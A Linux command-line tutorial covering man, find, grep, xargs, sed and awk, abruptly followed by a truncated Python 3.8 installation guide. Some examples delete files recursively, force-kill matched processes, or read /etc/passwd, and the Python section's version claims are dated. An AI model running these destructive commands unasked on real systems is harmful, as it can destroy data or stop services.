When we need a brief description of a command, we can use whatis; for a more detailed description, we can use the info command.
To see where a command is located, we use which.
For the specific parameters of a command and how to use it, we use the powerful man.

These commands are described below.

Command usage

View a brief description of the command

A brief description of what the command does (showing the man category page where the command is located):

$whatis command

Wildcard match:

$whatis -w "loca*"

Using man

Query the documentation for the command command:

$man command
eg: man date

Use Page Up and Page Down to scroll through the page.

The man help manual is divided into 9 categories (sections). A keyword may appear in more than one section, in which case we need to name the section we want to view (shell commands are generally in section 1).

The man page sections are identified as follows (the most commonly used are sections 1 and 3):

(1) commands and executables that users can run
(2) system calls, that is, functions provided by the kernel
(3) library functions
(4) device files
(5) configuration files and file formats
(6) games
(7) conventions and protocols, for example the Linux file system standard, network protocols, and ASCII codes
(8) commands available to the system administrator
(9) kernel-related documentation

As mentioned earlier, whatis shows the section in which each page for a command is located:

eg:
$whatis printf
printf (1) - format and print data
printf (1p) - write formatted output
printf (3) - formatted output conversion
printf (3p) - print formatted output
printf [builtins] (1) - bash built-in commands, see bash(1)

We see that printf is available in both category 1 and category 3; the pages in category 1 are for help on command operations and executables; while 3 is for instructions on commonly used libraries; if we want to see the use of printf in C, we can specify to see the help in category 3:

$man 3 printf

Search by keyword, for occasions when only part of a command name is remembered:

$man -k keyword

eg: Find GNOME's config tool command:

$man -k GNOME config| grep 1

To search for a word inside a man page, type /word, for example /-a to jump to the -a option. Also pay attention to the SEE ALSO section, which points to related pages.

Checking paths

Check the path to the program's binary file:

$which command

eg: Find the path where the make program is installed:

$which make
/opt/app/openav/soft/bin/make

Locate the binary, source, and manual page files of a program:

$whereis command

These lookups come in handy when there are multiple versions of the same software installed on the system and you are not sure which version is being used.
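As a small sketch of how such a lookup can be used inside a script, the snippet below relies on the shell builtin command -v (a POSIX counterpart to which that is not covered above) to test whether a command exists before using it. The function name describe_cmd is hypothetical and exists only for this illustration.

```shell
# describe_cmd is a hypothetical helper name used only for this sketch.
describe_cmd() {
    # command -v prints the path (or builtin name) and fails if nothing is found
    if location=$(command -v "$1"); then
        echo "$1 is available: $location"
    else
        echo "$1 is not installed"
        return 1
    fi
}

found=$(describe_cmd ls)
missing=$(describe_cmd no_such_command_xyz) || true
echo "$found"
echo "$missing"
```

Unlike which, command -v also reports shell builtins and functions, which makes it a common choice for this kind of check.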

File and directory management

Create and delete

Create a directory: mkdir
Delete: rm
Delete non-empty directories: rm -rf directory
Delete log files: rm *log (recursive equivalent: $find ./ -name "*log" -exec rm {} \;)
Move: mv
Copy: cp (Copy directory: cp -r )

Count the files and directories under the current directory (recursively, including the directory itself):

$find ./ | wc -l

Copy the directory:

$cp -r source_dir dest_dir

Directory switching

Go to a directory: cd
Switch to the previous working directory: cd -
Switch to the home directory: cd or cd ~
Show current path: pwd
Change the current working path to path: $cd path

List directory entries

Display the files in the current directory ls
Show directory entries as a list, sorted by time ls -lrt

This command is used so often that it is worth creating a shortcut for it.

Set the command aliases in .bashrc:

alias lsl='ls -lrt'
alias lm='ls -al|more'

With these in place, lsl displays the files in the directory as a list sorted by modification time.

Add a sequence number in front of each file name (for a neater look):

$ls | cat -n
     1  a
     2  a.out
     3  app
     4  b
     5  bin
     6  config

Note: .bashrc is stored as a hidden file under the /home/your username/ folder; you can check it with ls -a.

Find directories and files find/locate

Search for a file or directory:

$find ./ -name "core*" | xargs file

Check whether there are object (.o) files in the target folder:

$find ./ -name '*.o'

Recursively delete all .o files in the current directory and subdirectories:

$find ./ -name "*.o" -exec rm {} \;
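Because find with -exec rm is destructive, it can help to try it in a scratch directory first. The following is a minimal sketch under that assumption; the directory layout and file names are made up for the illustration.

```shell
# Work in a throwaway directory so nothing real is deleted.
workdir=$(mktemp -d)
mkdir -p "$workdir/src/lib"
touch "$workdir/src/main.c" "$workdir/src/main.o" "$workdir/src/lib/util.o"

# Count the object files at any depth.
before=$(find "$workdir" -name '*.o' | wc -l)

# Delete them; {} stands for each match and \; ends the -exec command.
find "$workdir" -name '*.o' -exec rm {} \;

after=$(find "$workdir" -name '*.o' | wc -l)
echo "object files before: $before, after: $after"
```

Running the find without -exec first, as done for the count, is a cheap way to preview exactly what would be removed.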

find searches the file system in real time. If you need a faster query, try locate, which looks names up in an index database of the file system instead.

Find paths that contain string:

$locate string

Because locate is not a real-time lookup, files created or removed since the last index update are not reflected. Run updatedb periodically to refresh the index database:

$updatedb

View file contents

To view the file: cat vi head tail more

Display the file with line numbers:

$cat -n filename

Show list contents by page:

$ls -al | more

See only the first 10 lines:

$head -10 filename

Show the first line of the file:

$head -1 filename

Show the last 5 lines of the file:

$tail -5 filename

See the difference between the two files:

$diff file1 file2

Dynamically display the latest information in the text:

$tail -f crawler.log
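head and tail can also be chained to pull a range of lines out of the middle of a file. The sketch below uses seq 20 as a stand-in for a 20-line file and the -n N spelling, which is the standard form of the -N shorthand used above.

```shell
# seq 20 stands in for a 20-line file.
first_three=$(seq 20 | head -n 3)
last_two=$(seq 20 | tail -n 2)
# Lines 5 to 7: take the first 7 lines, then the last 3 of those.
middle=$(seq 20 | head -n 7 | tail -n 3)

echo "$first_three"
echo "$last_two"
echo "$middle"
```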

Find the contents of a file

Use egrep to query the contents of a file:

egrep '03.1\/CO\/AE' TSF_STAT_111130.log.012
egrep 'A_LMCA777:C' TSF_STAT_111130.log.035 > co.out2

File and directory permission modification

Change the owner of a file: chown
Change the read, write, and execute attributes of a file: chmod
Recursive subdirectory modification: chown -R tuxapp source/
Add script executable permissions: chmod a+x myscript

Add aliases to files

Create symbolic/hard links:

ln cc ccAgain : hard link; if one of the two names is deleted, the content can still be reached through the other.
ln -s cc ccTo : symbolic link (soft link); if the source cc is deleted, ccTo no longer resolves (ccTo is the newly created link).
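The difference between the two kinds of link shows up once the original name is removed. This is a minimal sketch in a scratch directory; the file names follow the cc example above, and the directory itself is an assumption of the illustration.

```shell
workdir=$(mktemp -d)
echo "hello" > "$workdir/cc"
ln "$workdir/cc" "$workdir/ccAgain"      # hard link: a second name for the same data
ln -s "$workdir/cc" "$workdir/ccTo"      # symbolic link: a small file that stores the path to cc

rm "$workdir/cc"                         # remove the original name

hard_content=$(cat "$workdir/ccAgain")   # still readable through the hard link
# -e follows the link, so it is false once the target is gone
if [ -e "$workdir/ccTo" ]; then soft_state="ok"; else soft_state="dangling"; fi
echo "hard link content: $hard_content; symbolic link: $soft_state"
```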

Pipelines and Redirects

Pass the output of one command to the next: |
Run commands one after another: use semicolon ;
Run the next command only if the previous one succeeds: &&
Run the next command only if the previous one fails: ||

ls /proc && echo suss! || echo failed.

This reports whether the command succeeded or failed.

Written as an if statement, the same check is:

if ls /proc; then echo suss; else echo failed; fi
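The two forms agree as long as the middle command succeeds. They differ when it fails: in a && b || c the fallback c also runs if b fails, while the else branch of an if runs only when the condition fails. The sketch below makes that visible with true and false as stand-ins for real commands; the function names are hypothetical.

```shell
# chain_form and branch_form are hypothetical names for the two spellings.
chain_form()  { true && false || echo "fallback ran"; }
branch_form() { if true; then false; else echo "fallback ran"; fi; }

chain=$(chain_form)
branch=$(branch_form) || true   # branch_form returns the status of false; ignore it here

echo "chain:  '$chain'"
echo "branch: '$branch'"
```

With echo as the middle command, as in the example above, the difference rarely matters, since echo almost never fails.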

Redirect:

ls proc/*.c > list 2>&1

This redirects standard output and standard error to the same file.

The equivalent is:

ls proc/*.c &> list

Clear the file:

:> a.txt

Append to the end of a file:

echo aa >> a.txt
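To see the redirections side by side, the sketch below uses a small function that writes one line to each stream. The function name emit and the file names are assumptions made for the illustration.

```shell
workdir=$(mktemp -d)
# emit is a hypothetical helper: one line to stdout, one line to stderr.
emit() { echo "to stdout"; echo "to stderr" >&2; }

emit > "$workdir/out_only.txt" 2> /dev/null   # keep stdout, discard stderr
emit > "$workdir/both.txt" 2>&1               # stderr follows stdout into the file
emit >> "$workdir/both.txt" 2>&1              # >> appends instead of truncating
: > "$workdir/out_only.txt"                   # truncate the file to zero length

out_lines=$(wc -l < "$workdir/out_only.txt")
both_lines=$(wc -l < "$workdir/both.txt")
echo "out_only.txt: $out_lines lines, both.txt: $both_lines lines"
```

The order matters in the second form: 2>&1 must come after the > redirection, because it copies wherever stdout points at that moment.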

Setting environment variables

The file .profile is executed automatically when you log in to the account; you can set your own environment variables in it.

The path of the installed software usually needs to be added to the path:

PATH=$APPDIR:/opt/app/soft/bin:$PATH:/usr/local/bin:$TUXDIR/bin:$ORACLE_HOME/bin;export PATH

Bash shortcut input or delete

Shortcut keys:

Ctrl-U deletes all characters from the cursor to the beginning of the line, and in some settings, the entire line
Ctrl-W deletes the characters between the cursor and the nearest preceding space
Ctrl-H backspace, deletes the character in front of the cursor
Ctrl-R searches backward through the command history for the most recent match

Integrated Applications

Find the total number of records in record.log that contain AAA, but not BBB:

cat -v record.log | grep AAA | grep -v BBB | wc -l

Text processing

Find file search

find txt and pdf files:

find . \( -name "*.txt" -o -name "*.pdf" \) -print

Find .txt and .pdf files with a regular expression:

find . -regex ".*\(\.txt\|\.pdf\)$"

-iregex: the same as -regex, but ignores case

Negate an argument to find all files that are not .txt files:

find . ! -name "*.txt" -print

Specify the search depth, print out the files in the current directory (depth 1):

find . -maxdepth 1 -type f

Custom search

Search by type

find . -type d -print # list directories only

-type accepts f (regular files), l (symbolic links), and d (directories), among others.

The types supported by find distinguish between regular files, symbolic links, directories, and so on, but find cannot directly tell binary files from text files.

The file command can check the specific type of file (binary or text):

$file redis-cli # binary file
redis-cli: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
$file redis.pid # Text file
redis.pid: ASCII text

So, you can use the following combination of commands to find all the binary files in your local directory:

ls -lrt | awk '{print $9}'|xargs file|grep ELF| awk '{print $1}'|tr -d ':'

Search by time

-atime: access time (in days; -amin is the same test in minutes, and likewise for the options below)
-mtime: modification time (the content was modified)
-ctime: change time (metadata or permissions were changed)

All files that were last accessed exactly 7 days ago:

find . -atime 7 -type f -print

All files that have been accessed in the last 7 days:

find . -atime -7 -type f -print

All files that were last accessed more than 7 days ago:

find . -atime +7 -type f -print
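The three forms of the numeric argument (n, -n, +n) are easy to mix up, so here is a small experiment. It is a sketch that assumes GNU touch (for the -d 'N hours ago' syntax) and GNU find; the file names are invented, and ages are given in hours so that the day count find computes is unambiguous.

```shell
workdir=$(mktemp -d)
touch "$workdir/today.txt"                         # accessed just now
touch -a -d '180 hours ago' "$workdir/week.txt"    # 7.5 days, which find counts as 7
touch -a -d '240 hours ago' "$workdir/old.txt"     # 10 days

exactly=$(find "$workdir" -type f -atime 7  -exec basename {} \;)
recent=$(find "$workdir" -type f -atime -7 -exec basename {} \;)
older=$(find "$workdir" -type f -atime +7 -exec basename {} \;)

echo "exactly 7 days: $exactly"
echo "less than 7 days: $recent"
echo "more than 7 days: $older"
```

find discards the fractional part of the age in days, which is why the 7.5-day-old file matches -atime 7 and not -atime +7.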

Search by size

The size units are w (two-byte words), k, M, and G. Find files larger than 2k:

find . -type f -size +2k

Find by permissions:

find . -type f -perm 644 -print # find all files whose permissions are exactly 644 (rw-r--r--)

Find by user:

find . -type f -user weber -print # find files owned by user weber

Follow-up actions after finding

Delete

Delete all swp files in the current directory:

find . -type f -name "*.swp" -delete

Another syntax:

find . -type f -name "*.swp" | xargs rm

Execute action (powerful exec)

Change the owner of all files under the current directory that belong to root to weber:

find . -type f -user root -exec chown weber {} \;

Note: {} is a special string; for each matching file, {} is replaced with the corresponding file name.

Copy all the files found to another directory:

find . -type f -mtime +10 -name "*.txt" -exec cp {} OLD \;

Combining multiple commands

If you need to execute several commands for each match, you can put them in a script and call that script from -exec:

-exec ./commands.sh {} \;

-print's delimiter

By default, -print uses '\n' as the delimiter between file names.

-print0 uses '\0' as the delimiter instead, so that file names containing spaces can be passed on safely.
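The effect of the delimiter is easiest to see with a file name that contains a space. The sketch below assumes the temporary directory path itself contains no spaces; the file names are made up.

```shell
workdir=$(mktemp -d)
touch "$workdir/plain.txt" "$workdir/two words.txt"

# Whitespace splitting: xargs treats "two" and "words.txt" as separate arguments.
split_count=$(find "$workdir" -name '*.txt' -print | xargs -n 1 echo | wc -l)

# NUL-delimited: each file name arrives as a single argument.
safe_count=$(find "$workdir" -name '*.txt' -print0 | xargs -0 -n 1 echo | wc -l)

echo "arguments seen with -print: $split_count, with -print0: $safe_count"
```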

Grep text search

grep match_pattern file # prints the matching lines by default

Common parameters

-o prints only the matched part of each line, whereas -v prints only the lines that do not match

-c counts the number of lines in the file that contain the text

grep -c "text" filename

-n Print matching line numbers

-i Ignore case when searching

-l prints only the file name

Recursive search for text in multi-level directories (a favorite of programmers searching for code):

grep "class" . -R -n

Match multiple patterns:

grep -e "class" -e "virtual" file

Make grep terminate each output file name with a zero byte (-Z):

grep "test" file* -lZ| xargs -0 rm
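The options above can be compared on a small sample file. This is a sketch with made-up file contents; the variable names are only for the illustration.

```shell
workdir=$(mktemp -d)
printf 'class Foo\nint x;\nclass Bar\nCLASS Baz\n' > "$workdir/code.txt"

match_count=$(grep -c 'class' "$workdir/code.txt")       # number of matching lines
nocase_count=$(grep -c -i 'class' "$workdir/code.txt")   # the same, ignoring case
numbered=$(grep -n 'Bar' "$workdir/code.txt")            # line number before the match
only_match=$(grep -o 'class Foo' "$workdir/code.txt")    # only the matched text
inverted=$(grep -v -i 'class' "$workdir/code.txt")       # lines that do not match

echo "$match_count $nocase_count"
echo "$numbered"
echo "$only_match"
echo "$inverted"
```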

Comprehensive application: find all sql lookups with where conditions in the log:

cat LOG.* | tr a-z A-Z | grep "FROM " | grep "WHERE" > b

Example of searching for Chinese text: the project directory contains files in both UTF-8 and GB2312 encodings, and the word to find is 中文 ("Chinese").

Its UTF-8 and GB2312 encodings are E4B8ADE69687 and D6D0CEC4 respectively, so the query can be written as:

grep -rnP "\xE4\xB8\xAD\xE6\x96\x87|\xD6\xD0\xCE\xC4" *

Chinese character code lookup: http://bm.kdd.cc/

Xargs Command Line Parameter Conversion

xargs converts input data into command line arguments for a specific command, which lets it be combined with many other commands such as grep and find.

Convert multi-line output to single-line output:

cat file.txt| xargs

'\n' is the delimiter between the lines of the input.

Convert single line to multi-line output:

cat single.txt | xargs -n 3

-n: specifies the number of fields to display per line

Description of xargs parameters

-d defines the delimiter (by default arguments are separated by blanks; lines are separated by '\n')
-n specifies the number of arguments per output line, producing multi-line output
-I {} specifies the replacement string that is substituted when xargs expands the command, used when the argument must appear at a specific place in the command
-0 specifies '\0' as the input delimiter

Example:

cat file.txt | xargs -I {} ./command.sh -p {} -1

# Count the number of lines in the program
find source_dir/ -type f -name "*.cpp" -print0 |xargs -0 wc -l

# redis stores data by string and indexes by set; look up all values by index.
./redis-cli smembers $1 | awk '{print $1}'|xargs -I {} ./redis-cli get {}
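Since the examples above depend on files and scripts that may not exist on your machine, here is a self-contained sketch of the same options using only printf and echo. When no command is given, xargs runs echo.

```shell
# Multi-line input becomes a single line of arguments.
one_line=$(printf '1\n2\n3\n4\n5\n6\n' | xargs)

# -n 3 starts a new command line after every three arguments.
three_per_line=$(echo '1 2 3 4 5 6' | xargs -n 3)

# -I {} runs the command once per input line, substituting the line for {}.
wrapped=$(printf 'a\nb\n' | xargs -I {} echo "item={};")

echo "$one_line"
echo "$three_per_line"
echo "$wrapped"
```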

Sort

Field Description

-n sorts by number, whereas -d sorts in dictionary order
-r sorts in reverse order
-k N sorts by column N

Example:

sort -nrk 1 data.txt
sort -bd data # ignore leading blank characters such as spaces

Uniq Eliminate duplicate rows

Eliminate duplicate rows

sort unsort.txt | uniq

Count the number of times each row appears in the file

sort unsort.txt | uniq -c

Find duplicate rows

sort unsort.txt | uniq -d

You can restrict which part of each line is compared when looking for duplicates: -s N skips the first N characters, and -w N compares at most N characters.
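sort and uniq are most often used together to build a frequency table. The sketch below does this for a made-up list of words; the final awk step only reorders the two columns for readability.

```shell
input=$(printf 'pear\napple\npear\nfig\napple\npear\n')

# uniq only merges adjacent lines, so sort first; then rank by count, highest first.
ranking=$(echo "$input" | sort | uniq -c | sort -nr -k 1 | awk '{print $2 ":" $1}')

# Lines that occur more than once.
duplicates=$(echo "$input" | sort | uniq -d)

echo "$ranking"
echo "$duplicates"
```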

Converting with tr

General usage

echo 12345 | tr '0-9' '9876543210' # encryption and decryption conversion, replacing the corresponding characters
cat text| tr '\t' ' ' # tab to space conversion

tr delete characters

cat file | tr -d '0-9' # delete all numbers

-c find the complement

cat file | tr -c '0-9\n' ' ' # keep the numbers, replacing every other character with a space
cat file | tr -d -c '0-9 \n' # delete everything except digits, spaces, and newlines

tr compress characters

tr -s compresses repetitive characters in text; most often used to compress extra spaces:

cat file | tr -s ' '

Character classes
Various character classes are available in tr.

alnum: letters and numbers
alpha: letters
digit: numbers
space: blank characters
lower: lowercase
upper: uppercase
cntrl: control (non-printable) characters
print: printable characters

Usage: tr '[:class:]' '[:class:]'

tr '[:lower:]' '[:upper:]'
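The main tr modes can be tried on short strings without any input file. The sample strings below are made up for the illustration.

```shell
upper=$(echo 'Hello World' | tr '[:lower:]' '[:upper:]')   # translate a class
digits=$(echo 'tel: 555-0100' | tr -d -c '0-9\n')          # delete everything but digits
squeezed=$(echo 'a    b  c' | tr -s ' ')                   # squeeze repeated spaces
rotated=$(echo '12345' | tr '0-9' '9876543210')            # map each digit d to 9-d
restored=$(echo "$rotated" | tr '0-9' '9876543210')        # the same mapping undoes itself

echo "$upper | $digits | $squeezed | $rotated | $restored"
```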

Cut cut text by column

Extract the second and fourth columns of the file

cut -f2,4 filename

Print all columns of the file except column 3

cut -f3 --complement filename

-d Specify delimiters

cut -f2 -d";" filename

The range to take with cut

N- from the Nth field to the end
-M from the 1st field to the Mth field
N-M from the Nth field to the Mth field

The unit to be fetched by cut

-b in bytes
-c in characters
-f in fields (using delimiters)

Example:

cut -c1-5 file # print the first 5 characters
cut -c-2 file # print the first 2 characters

Extract characters 5 to 7 of the text

$echo string | cut -c5-7
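The field and character selections can be checked on a single delimited line. This is a sketch with an invented record; note that --complement is a GNU extension and may be missing from other cut implementations.

```shell
line='alice;30;berlin;engineer'

second=$(echo "$line" | cut -d';' -f2)
second_and_fourth=$(echo "$line" | cut -d';' -f2,4)
from_third=$(echo "$line" | cut -d';' -f3-)
all_but_third=$(echo "$line" | cut -d';' -f3 --complement)   # GNU cut only
chars=$(echo 'abcdefghij' | cut -c5-7)

echo "$second | $second_and_fourth | $from_third | $all_but_third | $chars"
```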

Paste Splice text by column

Splices two pieces of text together by column;

cat file1
1
2

cat file2
colin
book

paste file1 file2
1 colin
2 book

The default delimiter is tab, you can use -d to specify the delimiter:

paste file1 file2 -d ","
1,colin
2,book

Wc Tools for counting lines and characters

$wc -l file # count the number of lines

$wc -w file # count the number of words

$wc -c file # count the number of bytes (use -m to count characters)

Sed text replacement tool

First substitution

sed 's/text/replace_text/' file // Replace the first matching text on each line

Global replacement

sed 's/text/replace_text/g' file

By default sed prints the result of the replacement and leaves the file unchanged; to modify the original file directly, use -i:

sed -i 's/text/replace_text/g' file

Remove blank lines

sed '/^$/d' file

Variable conversion

The matched string is referenced by the & marker.

echo this is an example | sed 's/\w\+/[&]/g'
$>[this] [is] [an] [example]

Substring matching tokens

The contents of the first pair of matching brackets are referenced with \1

sed 's/hello\([0-9]\)/\1/'

Double quotes for values

sed expressions are usually wrapped in single quotes. Double quotes can also be used, in which case the shell expands variables inside the expression before sed sees it:

sed "s/$var/HELLO/"

When using double quotes, we can use shell variables in both the sed pattern and the replacement string.

eg:
p=patten
r=replaced
echo "line con a patten" | sed "s/$p/$r/g"
$>line con a replaced

Other examples

Insert a character into a string: convert each line of text (ABCDEF) to ABC/DEF:

sed 's/^.\{3\}/&\//g' file
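The sed features in this section (the & marker, \1 groups, shell variables in double quotes, and inserting a character) can be exercised together on short strings. The inputs are invented, and the first command uses the portable [a-z][a-z]* in place of the GNU-specific \w.

```shell
# & stands for the whole match.
bracketed=$(echo 'this is an example' | sed 's/[a-z][a-z]*/[&]/g')

# \1 stands for the text matched by the first \( \) group.
captured=$(echo 'hello7 world' | sed 's/hello\([0-9]\)/\1/')

# Double quotes let the shell substitute variables before sed runs.
p='cat'; r='dog'
substituted=$(echo 'one cat, two cats' | sed "s/$p/$r/g")

# Put a slash after the first three characters; the slash is escaped as \/.
slashed=$(echo 'ABCDEF' | sed 's/^.\{3\}/&\//')

echo "$bracketed | $captured | $substituted | $slashed"
```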

Awk data stream processing tool

The awk script structure

awk ' BEGIN{ statements } statements2 END{ statements } '

How it works

awk first executes the block of statements in BEGIN.
It then reads a line from the file or stdin and executes statements2, repeating the process until the input has been read in its entirety.
Finally it executes the END statement block.

print prints the current line

When print is used without arguments, the current line is printed

echo -e "line1\nline2" | awk 'BEGIN{print "start"} {print } END{ print "End" }'

When the arguments of print are separated by commas, they are printed with spaces between them:

echo | awk ' {var1 = "v1" ; var2 = "V2"; var3 = "v3"; \
print var1, var2 , var3; }'
$>v1 V2 v3

Joining the values with "-" as the connecting string:

echo | awk ' {var1 = "v1" ; var2 = "V2"; var3 = "v3"; \
print var1"-"var2"-"var3; }'
$>v1-V2-v3

Special variables: NR NF $0 $1 $2

NR: the number of records read so far; during execution it equals the current line number.

NF: the number of fields in the current line.

$0:this variable contains the text content of the current line during execution.

$1:the text content of the first field.

$2:the text content of the second field.

echo -e "line1 f2 f3 \n line2 \n line 3" | awk '{print NR":"$0"-"$1"-"$2}'

Print the second and third fields of each line

awk '{print $2, $3}' file

Count the number of lines in the file

awk ' END {print NR}' file

Accumulate the first field of each line

echo -e "1\n 2\n 3\n 4\n" | awk 'BEGIN{sum = 0 ;
print "begin";} {sum += $1;} END {print "=="; print sum }'
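To see NR, NF, and an END block working together, the sketch below runs awk over three made-up records of different lengths.

```shell
data=$(printf 'alice 30 berlin\nbob 25\ncarol 41 paris extra\n')

# NR is the current line number, NF the number of fields, $NF the last field.
report=$(echo "$data" | awk '{print NR ": " NF " fields, last=" $NF}')

# Sum the second column; the END block runs once after the last line.
total=$(echo "$data" | awk '{sum += $2} END {print sum}')

echo "$report"
echo "total: $total"
```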

Passing external variables

var=1000
echo | awk '{print vara}' vara=$var # Input from stdin
awk '{print vara}' vara=$var file # Input from file

Filter the lines processed by awk with a pattern

awk 'NR < 5' # line number less than 5
awk 'NR == 1,NR == 4 {print}' file # print lines 1 through 4 (a range)
awk '/linux/' # lines containing linux text (the pattern can be a regular expression, super powerful)
awk '! /linux/' # lines that do not contain linux text

Set delimiters

Use -F to set the field delimiter (default is whitespace):

awk -F: '{print $NF}' /etc/passwd

Read command output

Use getline to read the output of an external shell command into the variable cmdout:

echo | awk '{"grep root /etc/passwd" | getline cmdout; print cmdout }'

Using loops in awk

for(i=0;i<10;i++){print $i;}
for(i in array){print array[i];}

eg: Given the following string, print out the time string:

2015_04_02 20:20:08: mysqli connect failed, please check connect info
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F ":" '{ for(i=1;i<=3;i++) printf("%s:",$i)}'
>2015_04_02 20:20:08: # This way also prints a trailing colon
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F':' '{print $1 ":" $2 ":" $3; }'
>2015_04_02 20:20:08 # This way satisfies the requirement

And if you need to print out the later part as well (the time part is printed separately from the later text) :

$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F':' '{print $1 ":" $2 ":" $3; print $4;}'
>2015_04_02 20:20:08
>mysqli connect failed, please check connect info

Print the lines in reverse order (an implementation of the tac command):

seq 9| \
awk '{lifo[NR] = $0; lno=NR} \
END{ for(;lno>0;lno--){print lifo[lno];}
} '

awk combined with grep finds the specified service and kills it

ps -fe| grep msv8 | grep -v MFORWARD | awk '{print $2}' | xargs kill -9;

awk implementation of head and tail commands

head

awk 'NR<=10{print}' filename

tail

awk '{buffer[NR%10] = $0;} END{for(i=(NR>10?NR-9:1);i<=NR;i++){ \
print buffer[i%10]} } ' filename
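A ring-buffer version of tail is easy to get subtly wrong, so it is worth comparing against the real command. The sketch below wraps one possible implementation in a function (the name awk_tail is hypothetical) and checks it on inputs longer and shorter than ten lines.

```shell
# awk_tail is a hypothetical name; it prints the last 10 lines of stdin.
awk_tail() {
    awk '{buffer[NR % 10] = $0}
         END {
             # start at the oldest line still held in the 10-slot buffer
             for (i = (NR > 10 ? NR - 9 : 1); i <= NR; i++) print buffer[i % 10]
         }'
}

long_ok=no
[ "$(seq 25 | awk_tail)" = "$(seq 25 | tail -n 10)" ] && long_ok=yes
short_ok=no
[ "$(seq 4 | awk_tail)" = "$(seq 4 | tail -n 10)" ] && short_ok=yes

echo "matches tail on 25 lines: $long_ok; on 4 lines: $short_ok"
```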

Print the specified column

awk way to implement

ls -lrt | awk '{print $6}'

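The cut method (cut splits on tabs by default, so squeeze the runs of spaces first and split on a single space)

ls -lrt | tr -s ' ' | cut -d' ' -f6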

Print the specified text area

Determine the line number

seq 100| awk 'NR==4,NR==6{print}'

Determine the text

Print the text between start_pattern and end_pattern:

awk '/start_pattern/, /end_pattern/' filename

Example:

seq 100 | awk '/13/,/15/'
cat /etc/passwd| awk '/mai.*mail/,/news.*news/'

awk common built-in functions

index(string,search_string): return the position of search_string in string

sub(regex,replacement_str,string): replace the first regular expression match in string with replacement_str

match(string,regex): check whether the regular expression matches the string, returning the position of the match (0 if there is none)

length(string):return the length of the string

echo | awk '{"grep root /etc/passwd" | getline cmdout; print length(cmdout) }'

printf is similar to printf in c, and formats the output:

seq 10 | awk '{printf "->%4s\n", $1}'

Iterate over lines, words and characters in a file

Iterate over each line in the file

while loop method

while read -r line;
do
echo "$line";
done < file.txt

The same loop, run in a subshell at the end of a pipeline:
cat file.txt | (while read -r line;do echo "$line";done)

awk method

cat file.txt| awk '{print}'

Iterate over each word in a line

for word in $line;
do
echo $word;
done

Iterate over each character

${string:start_pos:num_of_chars}: extract num_of_chars characters from the string, starting at start_pos (bash text slicing)

${#word}: return the length of the variable word

for((i=0;i<${#word};i++))
do
echo ${word:i:1};
done
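As a small application of character-by-character iteration, the sketch below reverses a string. It assumes bash, since both the for ((...)) loop and the ${word:i:1} slice are bash features that a plain POSIX sh does not provide; the sample word is arbitrary.

```shell
word='shell'
reversed=''
for ((i = 0; i < ${#word}; i++)); do
    char=${word:i:1}            # one character starting at offset i
    reversed="$char$reversed"   # prepend, so the order ends up reversed
done
echo "$word has ${#word} characters; reversed: $reversed"
```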

Display the file in ASCII characters:

$od -c filename

Python Programming Quick Guide - Installation and Basic IO

https://www.liaoxuefeng.com/wiki/1016959663602400

https://www.w3schools.com/python/python_intro.asp

https://docs.python.org/3/

What is Python?

Python is a popular programming language. It was created by Guido van Rossum, and released in 1991.

It is used for:

web development (server-side),
software development,
mathematics,
system scripting.

What can Python do?

Python can be used on a server to create web applications.
Python can be used alongside software to create workflows.
Python can connect to database systems. It can also read and modify files.
Python can be used to handle big data and perform complex mathematics.
Python can be used for rapid prototyping, or for production-ready software development.

Why Python?

Python works on different platforms (Windows, Mac, Linux, Raspberry Pi, etc).
Python has a simple syntax similar to the English language.
Python has a syntax that allows developers to write programs with fewer lines than some other programming languages.
Python runs on an interpreter system, meaning that code can be executed as soon as it is written. This means that prototyping can be very quick.
Python can be treated in a procedural way, an object-oriented way, or a functional way.

Good to know

The most recent major version of Python is Python 3, which we shall be using in this tutorial. Python 2 reached its end of life on January 1, 2020 and no longer receives updates, although it still turns up in older code.
In this tutorial, Python will be written in a text editor. It is possible to write Python in an Integrated Development Environment, such as Thonny, Pycharm, Netbeans, or Eclipse which are particularly useful when managing larger collections of Python files.

Python Syntax compared to other programming languages

Python was designed for readability, and has some similarities to the English language with influence from mathematics.
Python uses new lines to complete a command, as opposed to other programming languages which often use semicolons or parentheses.
Python relies on indentation, using whitespace, to define scope; such as the scope of loops, functions, and classes. Other programming languages often use curly brackets for this purpose.

Example

print("Hello, World!")

Installing Python

Because Python is cross-platform, it can run on Windows, Mac, and various Linux/Unix systems. Python programs written on Windows are capable of running when put on Linux.

To start learning Python programming, you first have to install Python into your computer. Once installed, you'll get the Python interpreter (which is responsible for running Python programs), a command line interactive environment, and a simple integrated development environment.

Installing Python 3.8

Currently, there are two versions of Python, version 2.x and version 3.x, which are incompatible. Since version 3.x is becoming more and more popular, our tutorial will be based on the latest Python version 3.8. Please make sure that the version of Python installed on your computer is the latest 3.8.x so that you can learn this tutorial painlessly.

Installing Python on a Mac

If you are using a Mac with OS X>=10.9, the version of Python that comes with the system is 2.7. To install the latest Python 3.8, there are two methods.

Method 1: Download the Python 3.8 installer from the official Python website, then double-click the downloaded file and follow the prompts to install it.

Method 2: If Homebrew is installed, just install it directly via the command brew install python3.

Installing Python on Linux

If you are using Linux, I assume that you have Linux system administration experience and should have no problem installing Python 3 on your own. Otherwise, switch back to Windows.

For a large number of students who are currently still using Windows, if you have no plans to switch to a Mac soon, you can continue reading below.

Installing Python on Windows

First, depending on your version of Windows (64-bit or 32-bit), download the 64-bit or the 32-bit installer. Then run the downloaded exe installer:

Pay special attention to checking Add Python 3.8 to PATH, and then click Install Now to complete the installation.

Run Python

After successful installation, open a command prompt window and type python. One of two things will happen.

Case 1: Python starts successfully.

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python                                             │
│Python 3.8.x ...                                        │
│[MSC v... 64 bit (AMD64)] on win32                      │
│Type "help", "copyright", "credits" or "license" for mor│
│information.                                            │
│>>> _                                                   │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

Seeing the above screen means that Python was installed successfully!

Seeing the prompt >>> means that we are in the Python interactive environment, where you can type any Python code and get the result immediately after pressing Enter. Now, type exit() and press Enter to leave the Python interactive environment (you can also simply close the command line window).

Case 2: You get an error.

┌────────────────────────────────────────────────────────┐
